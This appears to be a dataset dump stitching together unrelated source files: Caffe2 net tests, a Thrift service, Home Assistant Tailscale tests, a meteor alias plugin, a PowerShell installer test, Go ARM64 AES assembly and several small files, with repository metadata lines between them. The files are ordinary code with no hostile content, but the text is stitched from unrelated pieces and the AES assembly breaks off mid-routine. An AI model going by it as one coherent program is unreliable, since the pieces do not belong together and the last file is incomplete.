std::unique_ptr<NetBase> net(CreateNet(net_def, &ws));
for (int i = 0; i < 10; i++) {
counter.exchange(0);
bool run_result = false;
try {
run_result = net->Run();
} catch (const std::exception&) {
// async_scheduling would throw
}
ASSERT_FALSE(run_result);
ASSERT_EQ(1, counter.load());
}
}
}
const int kTestPoolSize = 4;
class ExecutorHelperDummyOp final : public OperatorBase {
public:
using OperatorBase::OperatorBase;
ExecutorHelperDummyOp(const OperatorDef& operator_def, Workspace* ws)
: OperatorBase(operator_def, ws) {}
bool Run(int /* unused */ /*stream_id*/) override {
auto helper = GetExecutorHelper();
CAFFE_ENFORCE(helper);
auto pool = helper->GetPool(device_option());
CAFFE_ENFORCE(pool);
auto pool_size = pool->size();
CAFFE_ENFORCE_EQ(pool_size, kTestPoolSize);
return true;
}
};
REGISTER_CPU_OPERATOR(ExecutorHelperDummy, ExecutorHelperDummyOp);
OPERATOR_SCHEMA(ExecutorHelperDummy);
TEST(NetTest, OperatorWithExecutorHelper) {
const auto spec = R"DOC(
name: "example"
type: "async_scheduling"
op {
type: "ExecutorHelperDummy"
}
)DOC";
NetDef net_def;
CAFFE_ENFORCE(TextFormat::ParseFromString(spec, &net_def));
Workspace ws;
net_def.set_num_workers(kTestPoolSize);
std::unique_ptr<NetBase> net(CreateNet(net_def, &ws));
ASSERT_TRUE(net->Run());
}
TEST(NetTest, DISABLED_OperatorWithDisabledEvent) {
const auto spec = R"DOC(
name: "example"
type: "async_scheduling"
external_input: "in"
op {
input: "in"
output: "out"
type: "NetTestDummy"
arg {
name: "fail"
i: 1
}
}
)DOC";
Workspace ws;
ws.CreateBlob("in");
NetDef net_def;
CAFFE_ENFORCE(TextFormat::ParseFromString(spec, &net_def));
{
std::unique_ptr<NetBase> net(CreateNet(net_def, &ws));
net->GetOperators()[0]->DisableEvent();
// async_scheduling propagates exception
bool caught_exception = false;
try {
net->Run();
} catch (const std::exception& e) {
caught_exception = true;
}
ASSERT_TRUE(caught_exception);
}
}
TEST(NetTest, ExecutorOverride) {
const auto spec = R"DOC(
name: "example"
type: "dag"
)DOC";
NetDef net_def;
CAFFE_ENFORCE(TextFormat::ParseFromString(spec, &net_def));
{
Workspace ws;
auto old = FLAGS_caffe2_override_executor;
auto g = MakeGuard([&]() { FLAGS_caffe2_override_executor = old; });
FLAGS_caffe2_override_executor = "dag,async_scheduling";
std::unique_ptr<NetBase> net(CreateNet(net_def, &ws));
auto async_net =
caffe2::dynamic_cast_if_rtti<AsyncSchedulingNet*>(net.get());
ASSERT_TRUE(async_net != nullptr);
}
}
TEST(NetTest, AsyncEmptyNet) {
const auto spec = R"DOC(
name: "example"
type: "async_scheduling"
)DOC";
Workspace ws;
NetDef net_def;
CAFFE_ENFORCE(TextFormat::ParseFromString(spec, &net_def));
{
std::unique_ptr<NetBase> net(CreateNet(net_def, &ws));
bool caught_exception = false;
try {
ASSERT_TRUE(net->Run());
} catch (const std::exception& e) {
caught_exception = true;
}
ASSERT_FALSE(caught_exception);
}
}
TEST(NetTest, DISABLED_RunAsyncFailure) {
const auto spec = R"DOC(
name: "example"
type: "async_scheduling"
op {
input: "in"
output: "out"
type: "NetTestDummy"
arg {
name: "fail"
i: 1
}
}
)DOC";
Workspace ws;
ws.CreateBlob("in");
NetDef net_def;
CAFFE_ENFORCE(TextFormat::ParseFromString(spec, &net_def));
{
std::unique_ptr<NetBase> net(CreateNet(net_def, &ws));
bool caught_exception = false;
try {
ASSERT_FALSE(net->Run());
} catch (const std::exception& e) {
caught_exception = true;
}
ASSERT_TRUE(caught_exception);
}
}
TEST(NetTest, NoTypeNet) {
const auto spec = R"DOC(
name: "no_type_net"
)DOC";
Workspace ws;
NetDef net_def;
CAFFE_ENFORCE(TextFormat::ParseFromString(spec, &net_def));
{
std::unique_ptr<NetBase> net(CreateNet(net_def, &ws));
ASSERT_TRUE(net);
}
}
class NotFinishingOp final : public Operator<CPUContext> {
public:
NotFinishingOp(const OperatorDef& operator_def, Workspace* ws)
: Operator<CPUContext>(operator_def, ws) {}
bool RunOnDevice() override {
// never calls SetFinished
return true;
}
bool HasAsyncPart() const override {
return true;
}
};
REGISTER_CPU_OPERATOR(NotFinishingOp, NotFinishingOp);
OPERATOR_SCHEMA(NotFinishingOp);
TEST(NetTest, PendingOpsAndNetFailure) {
const auto spec = R"DOC(
name: "example"
type: "async_scheduling"
op {
type: "NotFinishingOp"
}
op {
type: "NetTestDummy"
arg {
name: "fail"
i: 1
}
}
)DOC";
NetDef net_def;
CAFFE_ENFORCE(TextFormat::ParseFromString(spec, &net_def));
Workspace ws;
std::unique_ptr<NetBase> net(CreateNet(net_def, &ws));
try {
// net is not stuck and returns false
ASSERT_FALSE(net->Run());
} catch (const caffe2::AsyncNetCancelled&) {
// Cancellation exception is fine since if the ops run concurrently the
// NotFinishingOp may be cancelled with an exception.
}
}
class AsyncErrorOp final : public Operator<CPUContext> {
public:
AsyncErrorOp(const OperatorDef& operator_def, Workspace* ws)
: Operator<CPUContext>(operator_def, ws),
throw_(OperatorBase::GetSingleArgument<bool>("throw", false)),
fail_in_sync_(
OperatorBase::GetSingleArgument<bool>("fail_in_sync", false)),
sleep_time_s_(OperatorBase::GetSingleArgument<int>("sleep_time", 1)),
error_msg_(OperatorBase::GetSingleArgument<std::string>(
"error_msg",
"Error")) {}
bool RunOnDevice() override {
if (fail_in_sync_) {
if (throw_) {
throw std::logic_error(error_msg_);
} else {
return false;
}
} else {
if (thread_) {
thread_->join();
}
thread_ = std::make_unique<std::thread>([this]() {
try {
std::this_thread::sleep_for(std::chrono::seconds(sleep_time_s_));
if (throw_) {
throw std::logic_error(error_msg_);
} else {
if (!cancel_.test_and_set()) {
event().SetFinished(error_msg_.c_str());
}
}
} catch (...) {
if (!cancel_.test_and_set()) {
event().SetFinishedWithException(error_msg_.c_str());
}
}
});
return true;
}
}
bool HasAsyncPart() const override {
return true;
}
void CancelAsyncCallback() override {
cancel_.test_and_set();
}
~AsyncErrorOp() override {
if (thread_) {
thread_->join();
}
}
private:
std::unique_ptr<std::thread> thread_;
bool throw_;
bool fail_in_sync_;
int sleep_time_s_;
std::string error_msg_;
std::atomic_flag cancel_ = ATOMIC_FLAG_INIT;
};
REGISTER_CPU_OPERATOR(AsyncErrorOp, AsyncErrorOp);
OPERATOR_SCHEMA(AsyncErrorOp);
std::unique_ptr<NetBase> AsyncErrorNet(
Workspace* ws,
const std::string& net_name,
bool throw_,
bool fail_in_sync) {
std::string spec_template = R"DOC(
name: "<NET_NAME>"
type: "async_scheduling"
op {
type: "AsyncErrorOp"
arg {
name: "throw"
i: <THROW>
}
arg {
name: "fail_in_sync"
i: <FAIL_IN_SYNC>
}
}
)DOC";
std::string spec = spec_template;
ReplaceAll(spec, "<NET_NAME>", net_name.c_str());
ReplaceAll(spec, "<THROW>", throw_ ? "1" : "0");
ReplaceAll(spec, "<FAIL_IN_SYNC>", fail_in_sync ? "1" : "0");
NetDef net_def;
CAFFE_ENFORCE(TextFormat::ParseFromString(spec, &net_def));
return CreateNet(net_def, ws);
}
TEST(NetTest, AsyncErrorOpTest) {
Workspace ws;
// Throw in sync part
auto net = AsyncErrorNet(&ws, "net1", /*throw_*/ true, /*fail_in_sync*/ true);
#ifdef CAFFE2_USE_EXCEPTION_PTR
// NOLINTNEXTLINE(cppcoreguidelines-avoid-goto,hicpp-avoid-goto)
ASSERT_THROW(net->Run(), std::logic_error);
#endif
// Return false in sync part
net = AsyncErrorNet(&ws, "net2", /*throw_*/ false, /*fail_in_sync*/ true);
ASSERT_FALSE(net->Run());
// SetFinishedWithException in async part
net = AsyncErrorNet(&ws, "net3", /*throw_*/ true, /*fail_in_sync*/ false);
#ifdef CAFFE2_USE_EXCEPTION_PTR
// NOLINTNEXTLINE(cppcoreguidelines-avoid-goto,hicpp-avoid-goto)
ASSERT_THROW(net->Run(), std::logic_error);
#endif
// SetFinished(err) in async part
net = AsyncErrorNet(&ws, "net4", /*throw_*/ false, /*fail_in_sync*/ false);
ASSERT_FALSE(net->Run());
}
TEST(NetTest, AsyncErrorTimingsTest) {
Workspace ws;
std::string spec = R"DOC(
name: "net"
type: "async_scheduling"
op {
type: "AsyncErrorOp"
arg {
name: "throw"
i: 1
}
arg {
name: "fail_in_sync"
i: 0
}
arg {
name: "sleep_time"
i: 2
}
arg {
name: "error_msg"
s: "Error1"
}
}
op {
type: "AsyncErrorOp"
arg {
name: "throw"
i: 1
}
arg {
name: "fail_in_sync"
i: 0
}
arg {
name: "sleep_time"
i: 1
}
arg {
name: "error_msg"
s: "Error2"
}
}
)DOC";
NetDef net_def;
CAFFE_ENFORCE(TextFormat::ParseFromString(spec, &net_def));
auto net = CreateNet(net_def, &ws);
try {
net->Run();
} catch (const std::logic_error& e) {
ASSERT_TRUE(std::string(e.what()) == "Error2");
} catch (...) {
FAIL() << "Expected std::logic_error thrown";
}
}
class SyncErrorOp final : public Operator<CPUContext> {
public:
SyncErrorOp(const OperatorDef& operator_def, Workspace* ws)
: Operator<CPUContext>(operator_def, ws),
fail_(OperatorBase::GetSingleArgument<bool>("fail", true)),
throw_(OperatorBase::GetSingleArgument<bool>("throw", false)) {}
bool RunOnDevice() override {
if (fail_) {
if (throw_) {
throw std::logic_error("Error");
} else {
return false;
}
} else {
return true;
}
}
// NOLINTNEXTLINE(modernize-use-equals-default)
~SyncErrorOp() override {}
private:
bool fail_;
bool throw_;
};
REGISTER_CPU_OPERATOR(SyncErrorOp, SyncErrorOp);
OPERATOR_SCHEMA(SyncErrorOp);
std::unique_ptr<NetBase>
ChainErrorNet(Workspace* ws, const std::string& net_name, bool throw_) {
std::string spec_template = R"DOC(
name: "<NET_NAME>"
type: "async_scheduling"
op {
type: "SyncErrorOp"
arg {
name: "fail"
i: 1
}
arg {
name: "throw"
i: <THROW>
}
}
op {
type: "SyncErrorOp"
arg {
name: "fail"
i: 0
}
}
)DOC";
std::string spec = spec_template;
ReplaceAll(spec, "<NET_NAME>", net_name.c_str());
ReplaceAll(spec, "<THROW>", throw_ ? "1" : "0");
NetDef net_def;
CAFFE_ENFORCE(TextFormat::ParseFromString(spec, &net_def));
return CreateNet(net_def, ws);
}
TEST(NetTest, ChainErrorTest) {
Workspace ws;
auto net = ChainErrorNet(&ws, "net1", /*throw_*/ true);
#ifdef CAFFE2_USE_EXCEPTION_PTR
// NOLINTNEXTLINE(cppcoreguidelines-avoid-goto,hicpp-avoid-goto)
ASSERT_THROW(net->Run(), std::logic_error);
#endif
net = ChainErrorNet(&ws, "net2", /*throw_*/ false);
ASSERT_FALSE(net->Run());
}
void testProfDAGNetErrorCase(bool test_error) {
std::string spec_template = R"DOC(
name: "prof_dag_error_test_net"
type: "prof_dag"
external_input: "in"
op {
input: "in"
output: "hidden"
type: "SyncErrorOp"
arg {
name: "fail"
i: <FAIL>
}
arg {
name: "throw"
i: 0
}
}
op {
input: "hidden"
output: "out"
type: "SyncErrorOp"
arg {
name: "fail"
i: 0
}
}
)DOC";
Workspace ws;
ws.CreateBlob("in");
NetDef net_def;
std::string net_spec = spec_template;
ReplaceAll(net_spec, "<FAIL>", test_error ? "1" : "0");
CAFFE_ENFORCE(TextFormat::ParseFromString(net_spec, &net_def));
auto net = CreateNet(net_def, &ws);
// with failing op - net runs return false, without - true
for (auto num_runs = 0; num_runs < 10; ++num_runs) {
auto ret = net->Run();
ASSERT_TRUE(test_error ? !ret : ret);
}
// with failing op - prof_dag handles invalid runs and returns empty stats,
// without - returns stats for each op
auto* prof_dag = dynamic_cast_if_rtti<AsyncNetBase*>(net.get());
CHECK_NOTNULL(prof_dag);
auto stats_proto = prof_dag->GetPerOperatorCost();
ASSERT_EQ(
stats_proto.stats_size(), test_error ? 0 : net->GetOperators().size());
}
TEST(NetTest, ProfDAGNetErrorTest) {
testProfDAGNetErrorCase(/*test_error=*/false);
testProfDAGNetErrorCase(/*test_error=*/true);
}
} // namespace caffe2
| C++ | 5 | Hacky-DH/pytorch | caffe2/core/net_test.cc | [
"Intel"
] |
// Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
namespace cpp predictor_service
service Predictor {
// Returns scores for each class
map<string, double> predict(1: string doc);
}
| Thrift | 4 | digitalsatori/pytext | demo/xlm_server/server/predictor.thrift | [
"BSD-3-Clause"
] |
<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
<xsl:output method="html" encoding="UTF-8"
doctype-public="-//W3C//DTD HTML 4.01 Transitional//EN" />
<xsl:include href="xslt-apply-enc16-sheet.xsl"/>
<xsl:template match="/">
<html>
<body>
UTF-8
<xsl:call-template name="target"/>
</body>
</html>
</xsl:template>
</xsl:stylesheet>
| XSLT | 3 | zealoussnow/chromium | third_party/blink/web_tests/fast/xsl/resources/xslt-import-enc16.xsl | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] |
"""Tests for the Tailscale integration."""
from unittest.mock import MagicMock
from tailscale import TailscaleAuthenticationError, TailscaleConnectionError
from homeassistant.components.tailscale.const import DOMAIN
from homeassistant.config_entries import SOURCE_REAUTH, ConfigEntryState
from homeassistant.core import HomeAssistant
from tests.common import MockConfigEntry
async def test_load_unload_config_entry(
hass: HomeAssistant,
mock_config_entry: MockConfigEntry,
mock_tailscale: MagicMock,
) -> None:
"""Test the Tailscale configuration entry loading/unloading."""
mock_config_entry.add_to_hass(hass)
await hass.config_entries.async_setup(mock_config_entry.entry_id)
await hass.async_block_till_done()
assert mock_config_entry.state is ConfigEntryState.LOADED
await hass.config_entries.async_unload(mock_config_entry.entry_id)
await hass.async_block_till_done()
assert not hass.data.get(DOMAIN)
assert mock_config_entry.state is ConfigEntryState.NOT_LOADED
async def test_config_entry_not_ready(
hass: HomeAssistant,
mock_config_entry: MockConfigEntry,
mock_tailscale: MagicMock,
) -> None:
"""Test the Tailscale configuration entry not ready."""
mock_tailscale.devices.side_effect = TailscaleConnectionError
mock_config_entry.add_to_hass(hass)
await hass.config_entries.async_setup(mock_config_entry.entry_id)
await hass.async_block_till_done()
assert len(mock_tailscale.devices.mock_calls) == 1
assert mock_config_entry.state is ConfigEntryState.SETUP_RETRY
async def test_config_entry_authentication_failed(
hass: HomeAssistant,
mock_config_entry: MockConfigEntry,
mock_tailscale: MagicMock,
) -> None:
"""Test trigger reauthentication flow."""
mock_config_entry.add_to_hass(hass)
mock_tailscale.devices.side_effect = TailscaleAuthenticationError
await hass.config_entries.async_setup(mock_config_entry.entry_id)
await hass.async_block_till_done()
assert mock_config_entry.state is ConfigEntryState.SETUP_ERROR
flows = hass.config_entries.flow.async_progress()
assert len(flows) == 1
flow = flows[0]
assert flow.get("step_id") == "reauth_confirm"
assert flow.get("handler") == DOMAIN
assert "context" in flow
assert flow["context"].get("source") == SOURCE_REAUTH
assert flow["context"].get("entry_id") == mock_config_entry.entry_id
| Python | 5 | MrDelik/core | tests/components/tailscale/test_init.py | [
"Apache-2.0"
] |
# Aliases in alphabetical order
alias ma='meteor add' # Add a package to this project.
alias map='meteor add-platform' # Add a platform to this project.
alias mad='meteor admin' # Administrative commands.
alias mau='meteor authorized' # View or change authorized users and organizations for a site.
alias mb='meteor build' # Build this project for all platforms.
alias mcl='meteor claim' # Claim a site deployed with an old Meteor version.
alias mca='meteor configure-android' # Run the Android configuration tool from Meteor's ADK environment.
alias mc='meteor create' # Create a new project.
alias mdb='meteor debug' # Run the project, but suspend the server process for debugging.
alias mde='meteor deploy' # Deploy this project to Meteor.
alias mis='meteor install-sdk' # Installs SDKs for a platform.
alias ml='meteor list' # List the packages explicitly used by your project.
alias mlp='meteor list-platforms' # List the platforms added to your project.
alias mls='meteor list-sites' # List sites for which you are authorized.
alias mli='meteor login' # Log in to your Meteor developer account.
alias mlo='meteor logout' # Log out of your Meteor developer account.
alias mlog='meteor logs' # Show logs for specified site.
alias mm='meteor mongo' # Connect to the Mongo database for the specified site.
alias mp='meteor publish' # Publish a new version of a package to the package server.
alias mpa='meteor publish-for-arch' # Builds an already-published package for a new platform.
alias mpr='meteor publish-release' # Publish a new meteor release to the package server.
alias mr='meteor remove' # Remove a package from this project.
alias mrp='meteor remove-platform' # Remove a platform from this project.
alias mre='meteor reset' # Reset the project state. Erases the local database.
alias m='meteor run' # [default] Run this project in local development mode.
alias ms='meteor search' # Search through the package server database.
alias msh='meteor shell' # Launch a Node REPL for interactively evaluating server-side code.
alias msw='meteor show' # Show detailed information about a release or package.
alias mt='meteor test-packages' # Test one or more packages.
alias mu='meteor update' # Upgrade this project's dependencies to their latest versions.
alias mw='meteor whoami' # Prints the username of your Meteor developer account.
| Shell | 5 | chensanle/ohmyzsh | plugins/meteor/meteor.plugin.zsh | [
"MIT"
] |
#(ly:message (format "input-filename: ~a\n" lyp:input-filename))
#(ly:message (format "input-dirname: ~a\n" lyp:input-dirname))
\require "b"
#(ly:message (format "bvar: ~a\n" bvar))
| LilyPond | 2 | HolgerPeters/lyp | spec/user_files/test_vars.ly | [
"MIT"
] |
#!/bin/bash maple
# Use `maple -q expand2.mpl -D n=15` to run
e := (x + y + z + w) ^ n:
f := e * (e + w):
st := time[real]():
f := expand(f):
1000*(time[real]() - st);
done
| Maple | 3 | jmig5776/symengine | benchmarks/expand2.mpl | [
"MIT"
] |
resolve=Slå upp funna serveradresser,1,1-Ja,0-Nej
scan_time=Väntetid för att titta efter svar,0
| SystemVerilog | 1 | GalaxyGFX/webmin | servers/config.info.sv | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] |
<svg xmlns="http://www.w3.org/2000/svg" enable-background="new 0 0 24 24" height="24" viewBox="0 0 24 24" width="24"><g><rect fill="none" height="24" width="24"/></g><g><path d="M21,1H3C1.9,1,1,1.9,1,3v18c0,1.1,0.9,2,2,2h18c1.1,0,2-0.9,2-2V3C23,1.9,22.1,1,21,1z M5.41,4l5.18,5.17l-1.42,1.41 L4,5.41L5.41,4z M20,20h-5.5l2.05-2.05l-3.13-3.13l1.41-1.41l3.13,3.13L20,14.5V20z M20,9.5l-2.04-2.04L5.41,20L4,18.59L16.54,6.04 L14.5,4H20V9.5z"/></g></svg> | SVG | 2 | good-gym/material-ui | packages/material-ui-icons/material-icons/shuffle_on_two_tone_24px.svg | [
"MIT"
] |
#!/usr/bin/env bash
find "$@" -name '*.sh' -print0 | xargs -0 -n1 shellcheck --external-sources
| Shell | 4 | Hacky-DH/pytorch | tools/linter/run_shellcheck.sh | [
"Intel"
] |
- unless @one_satoshis.empty?
.panel.panel-primary
.panel-heading: span = t('.one')
= render partial: 'table', locals: {satoshis: @one_satoshis}
- unless @all_satoshis.empty?
.panel.panel-success
.panel-heading: span = t('.all')
= render partial: 'table', locals: {satoshis: @all_satoshis}
- if @all_satoshis.empty? and @one_satoshis.empty?
h3.text-info.text-center = t('.empty')
| Slim | 4 | childselfy/crypto-exchange | app/views/admin/withdraws/satoshis/index.html.slim | [
"MIT"
] |
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
Describe -Name "Windows EXE" -Fixture {
BeforeAll {
function Test-Elevated {
[CmdletBinding()]
[OutputType([bool])]
Param()
# if the current Powershell session was called with administrator privileges,
# the Administrator Group's well-known SID will show up in the Groups for the current identity.
# Note that the SID won't show up unless the process is elevated.
return (([Security.Principal.WindowsIdentity]::GetCurrent()).Groups -contains "S-1-5-32-544")
}
function Invoke-ExeInstaller {
param(
[Parameter(ParameterSetName = 'Install', Mandatory)]
[Switch]$Install,
[Parameter(ParameterSetName = 'Uninstall', Mandatory)]
[Switch]$Uninstall,
[Parameter(Mandatory)]
[ValidateScript({Test-Path -Path $_})]
[String]$ExePath
)
$action = "$($PSCmdlet.ParameterSetName)ing"
if ($Install) {
$switch = '/install'
} else {
$switch = '/uninstall'
}
$installProcess = Start-Process -wait $ExePath -ArgumentList $switch, '/quiet', '/norestart' -PassThru
if ($installProcess.ExitCode -ne 0) {
$exitCode = $installProcess.ExitCode
throw "$action EXE failed and returned error code $exitCode."
}
}
$exePath = $env:PsExePath
$channel = $env:PSMsiChannel
$runtime = $env:PSMsiRuntime
# Get any existing powershell in the path
$beforePath = @(([System.Environment]::GetEnvironmentVariable('PATH', 'MACHINE')) -split ';' |
Where-Object {$_ -like '*files\powershell*'})
foreach ($pathPart in $beforePath) {
Write-Warning "Found existing PowerShell path: $pathPart"
}
if (!(Test-Elevated)) {
Write-Warning "Tests must be elevated"
}
}
BeforeEach {
$error.Clear()
}
Context "$Channel-$Runtime" {
BeforeAll {
Write-Verbose "cr-$channel-$runtime" -Verbose
switch ("$channel-$runtime") {
"preview-win7-x64" {
$msiUpgradeCode = '39243d76-adaf-42b1-94fb-16ecf83237c8'
}
"stable-win7-x64" {
$msiUpgradeCode = '31ab5147-9a97-4452-8443-d9709f0516e1'
}
"preview-win7-x86" {
$msiUpgradeCode = '86abcfbd-1ccc-4a88-b8b2-0facfde29094'
}
"stable-win7-x86" {
$msiUpgradeCode = '1d00683b-0f84-4db8-a64f-2f98ad42fe06'
}
default {
throw "'$_' not a valid channel runtime combination"
}
}
}
It "$Channel MSI should not be installed before test" -Skip:(!(Test-Elevated)) {
$result = @(Get-CimInstance -Query "SELECT Value FROM Win32_Property WHERE Property='UpgradeCode' and Value = '{$msiUpgradeCode}'")
$result.Count | Should -Be 0 -Because "Query should return nothing if $channel $runtime is not installed"
}
It "EXE should install without error" -Skip:(!(Test-Elevated)) {
{
Invoke-ExeInstaller -Install -ExePath $exePath
} | Should -Not -Throw
}
It "Upgrade code should be correct" -Skip:(!(Test-Elevated)) {
$result = @(Get-CimInstance -Query "SELECT Value FROM Win32_Property WHERE Property='UpgradeCode' and Value = '{$msiUpgradeCode}'")
$result.Count | Should -Be 1 -Because "Query should return 1 result if Upgrade code is for $runtime $channel"
}
It "MSI should have updated path" -Skip:(!(Test-Elevated)) {
if ($channel -eq 'preview') {
$pattern = '*files*\powershell*\preview*'
} else {
$pattern = '*files*\powershell*'
}
$psPath = ([System.Environment]::GetEnvironmentVariable('PATH', 'MACHINE')) -split ';' |
Where-Object { $_ -like $pattern -and $_ -notin $beforePath }
if (!$psPath) {
([System.Environment]::GetEnvironmentVariable('PATH', 'MACHINE')) -split ';' |
Where-Object { $_ -notin $beforePath } |
ForEach-Object { Write-Verbose -Verbose $_ }
}
$psPath | Should -Not -BeNullOrEmpty
}
It "MSI should uninstall without error" -Skip:(!(Test-Elevated)) {
{
Invoke-ExeInstaller -Uninstall -ExePath $exePath
} | Should -Not -Throw
}
}
}
| PowerShell | 5 | rdtechie/PowerShell | test/packaging/windows/exe.tests.ps1 | [
"MIT"
] |
// Copyright 2017 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
#include "textflag.h"
DATA rotInvSRows<>+0x00(SB)/8, $0x080f0205040b0e01
DATA rotInvSRows<>+0x08(SB)/8, $0x00070a0d0c030609
GLOBL rotInvSRows<>(SB), (NOPTR+RODATA), $16
DATA invSRows<>+0x00(SB)/8, $0x0b0e0104070a0d00
DATA invSRows<>+0x08(SB)/8, $0x0306090c0f020508
GLOBL invSRows<>(SB), (NOPTR+RODATA), $16
// func encryptBlockAsm(nr int, xk *uint32, dst, src *byte)
TEXT ·encryptBlockAsm(SB),NOSPLIT,$0
MOVD nr+0(FP), R9
MOVD xk+8(FP), R10
MOVD dst+16(FP), R11
MOVD src+24(FP), R12
VLD1 (R12), [V0.B16]
CMP $12, R9
BLT enc128
BEQ enc196
enc256:
VLD1.P 32(R10), [V1.B16, V2.B16]
AESE V1.B16, V0.B16
AESMC V0.B16, V0.B16
AESE V2.B16, V0.B16
AESMC V0.B16, V0.B16
enc196:
VLD1.P 32(R10), [V3.B16, V4.B16]
AESE V3.B16, V0.B16
AESMC V0.B16, V0.B16
AESE V4.B16, V0.B16
AESMC V0.B16, V0.B16
enc128:
VLD1.P 64(R10), [V5.B16, V6.B16, V7.B16, V8.B16]
VLD1.P 64(R10), [V9.B16, V10.B16, V11.B16, V12.B16]
VLD1.P 48(R10), [V13.B16, V14.B16, V15.B16]
AESE V5.B16, V0.B16
AESMC V0.B16, V0.B16
AESE V6.B16, V0.B16
AESMC V0.B16, V0.B16
AESE V7.B16, V0.B16
AESMC V0.B16, V0.B16
AESE V8.B16, V0.B16
AESMC V0.B16, V0.B16
AESE V9.B16, V0.B16
AESMC V0.B16, V0.B16
AESE V10.B16, V0.B16
AESMC V0.B16, V0.B16
AESE V11.B16, V0.B16
AESMC V0.B16, V0.B16
AESE V12.B16, V0.B16
AESMC V0.B16, V0.B16
AESE V13.B16, V0.B16
AESMC V0.B16, V0.B16
AESE V14.B16, V0.B16
VEOR V0.B16, V15.B16, V0.B16
VST1 [V0.B16], (R11)
RET
// func decryptBlockAsm(nr int, xk *uint32, dst, src *byte)
TEXT ·decryptBlockAsm(SB),NOSPLIT,$0
MOVD nr+0(FP), R9
MOVD xk+8(FP), R10
MOVD dst+16(FP), R11
MOVD src+24(FP), R12
VLD1 (R12), [V0.B16]
CMP $12, R9
BLT dec128
BEQ dec196
dec256:
VLD1.P 32(R10), [V1.B16, V2.B16]
AESD V1.B16, V0.B16
AESIMC V0.B16, V0.B16
AESD V2.B16, V0.B16
AESIMC V0.B16, V0.B16
dec196:
VLD1.P 32(R10), [V3.B16, V4.B16]
AESD V3.B16, V0.B16
AESIMC V0.B16, V0.B16
AESD V4.B16, V0.B16
AESIMC V0.B16, V0.B16
dec128:
VLD1.P 64(R10), [V5.B16, V6.B16, V7.B16, V8.B16]
VLD1.P 64(R10), [V9.B16, V10.B16, V11.B16, V12.B16]
VLD1.P 48(R10), [V13.B16, V14.B16, V15.B16]
AESD V5.B16, V0.B16
AESIMC V0.B16, V0.B16
AESD V6.B16, V0.B16
AESIMC V0.B16, V0.B16
AESD V7.B16, V0.B16
AESIMC V0.B16, V0.B16
AESD V8.B16, V0.B16
AESIMC V0.B16, V0.B16
AESD V9.B16, V0.B16
AESIMC V0.B16, V0.B16
AESD V10.B16, V0.B16
AESIMC V0.B16, V0.B16
AESD V11.B16, V0.B16
AESIMC V0.B16, V0.B16
AESD V12.B16, V0.B16
AESIMC V0.B16, V0.B16
AESD V13.B16, V0.B16
AESIMC V0.B16, V0.B16
AESD V14.B16, V0.B16
VEOR V0.B16, V15.B16, V0.B16
VST1 [V0.B16], (R11)
RET
// func expandKeyAsm(nr int, key *byte, enc, dec *uint32) {
// Note that round keys are stored in uint128 format, not uint32
TEXT ·expandKeyAsm(SB),NOSPLIT,$0
MOVD nr+0(FP), R8
MOVD key+8(FP), R9
MOVD enc+16(FP), R10
MOVD dec+24(FP), R11
LDP rotInvSRows<>(SB), (R0, R1)
VMOV R0, V3.D[0]
VMOV R1, V3.D[1]
VEOR V0.B16, V0.B16, V0.B16 // All zeroes
MOVW $1, R13
TBZ $1, R8, ks192
TBNZ $2, R8, ks256
LDPW (R9), (R4, R5)
LDPW 8(R9), (R6, R7)
STPW.P (R4, R5), 8(R10)
STPW.P (R6, R7), 8(R10)
MOVW $0x1b, R14
ks128Loop:
VMOV R7, V2.S[0]
WORD $0x4E030042 // TBL V3.B16, [V2.B16], V2.B16
AESE V0.B16, V2.B16 // Use AES to compute the SBOX
EORW R13, R4
LSLW $1, R13 // Compute next Rcon
ANDSW $0x100, R13, ZR
CSELW NE, R14, R13, R13 // Fake modulo
SUBS $1, R8
VMOV V2.S[0], R0
EORW R0, R4
EORW R4, R5
EORW R5, R6
EORW R6, R7
STPW.P (R4, R5), 8(R10)
STPW.P (R6, R7), 8(R10)
BNE ks128Loop
CBZ R11, ksDone // If dec is nil we are done
SUB $176, R10
// Decryption keys are encryption keys with InverseMixColumns applied
VLD1.P 64(R10), [V0.B16, V1.B16, V2.B16, V3.B16]
VMOV V0.B16, V7.B16
AESIMC V1.B16, V6.B16
AESIMC V2.B16, V5.B16
AESIMC V3.B16, V4.B16
VLD1.P 64(R10), [V0.B16, V1.B16, V2.B16, V3.B16]
AESIMC V0.B16, V11.B16
AESIMC V1.B16, V10.B16
AESIMC V2.B16, V9.B16
AESIMC V3.B16, V8.B16
VLD1 (R10), [V0.B16, V1.B16, V2.B16]
AESIMC V0.B16, V14.B16
AESIMC V1.B16, V13.B16
VMOV V2.B16, V12.B16
VST1.P [V12.B16, V13.B16, V14.B16], 48(R11)
VST1.P [V8.B16, V9.B16, V10.B16, V11.B16], 64(R11)
VST1 [V4.B16, V5.B16, V6.B16, V7.B16], (R11)
B ksDone
ks192:
LDPW (R9), (R2, R3)
LDPW 8(R9), (R4, R5)
LDPW 16(R9), (R6, R7)
STPW.P (R2, R3), 8(R10)
STPW.P (R4, R5), 8(R10)
SUB $4, R8
ks192Loop:
STPW.P (R6, R7), 8(R10)
VMOV R7, V2.S[0]
WORD $0x4E030042 //TBL V3.B16, [V2.B16], V2.B16
AESE V0.B16, V2.B16
EORW R13, R2
LSLW $1, R13
SUBS $1, R8
VMOV V2.S[0], R0
EORW R0, R2
EORW R2, R3
EORW R3, R4
EORW R4, R5
EORW R5, R6
EORW R6, R7
STPW.P (R2, R3), 8(R10)
STPW.P (R4, R5), 8(R10)
BNE ks192Loop
CBZ R11, ksDone
SUB $208, R10
VLD1.P 64(R10), [V0.B16, V1.B16, V2.B16, V3.B16]
VMOV V0.B16, V7.B16
AESIMC V1.B16, V6.B16
AESIMC V2.B16, V5.B16
AESIMC V3.B16, V4.B16
VLD1.P 64(R10), [V0.B16, V1.B16, V2.B16, V3.B16]
AESIMC V0.B16, V11.B16
AESIMC V1.B16, V10.B16
AESIMC V2.B16, V9.B16
AESIMC V3.B16, V8.B16
VLD1.P 64(R10), [V0.B16, V1.B16, V2.B16, V3.B16]
AESIMC V0.B16, V15.B16
AESIMC V1.B16, V14.B16
AESIMC V2.B16, V13.B16
